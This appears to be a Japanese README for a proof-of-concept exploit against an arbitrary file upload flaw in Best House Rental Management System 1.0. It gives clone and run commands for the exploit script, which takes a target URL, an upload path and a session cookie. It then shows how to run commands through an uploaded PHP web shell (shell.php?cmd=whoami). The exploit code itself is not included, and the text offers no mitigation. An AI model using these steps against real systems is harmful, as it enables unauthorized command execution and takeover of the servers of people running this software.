
このPythonスクリプトは、Best House Rental Management System 1.0 の任意ファイルアップロード脆弱性を悪用する方法を示しています。この脆弱性により、攻撃者は悪意のあるファイル(PHPウェブシェルなど)をアップロードし、ターゲットサーバー上で任意のコマンドを実行できます。
リポジトリをクローンしてディレクトリに移動します:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
次のパラメータを指定してエクスプロイトを実行します:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: 脆弱なファイルアップロードページのURL(例: http:///rental/admin_class.php?view=save_settings) file_upload_path: アップロードされたファイルが保存されるパス(例: http:///path/to/uploaded/files) session_cookie: 認証済みユーザーのセッションクッキー
成功した場合、以下のURLにアクセスすることでターゲットサーバー上でコマンドを実行できます:
bash
http://<file_upload_path>/shell.php?cmd=whoami
whoami や uname -a などのコマンドを実行してテストしてください。
例
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
このコードはMITライセンスの下で公開されています。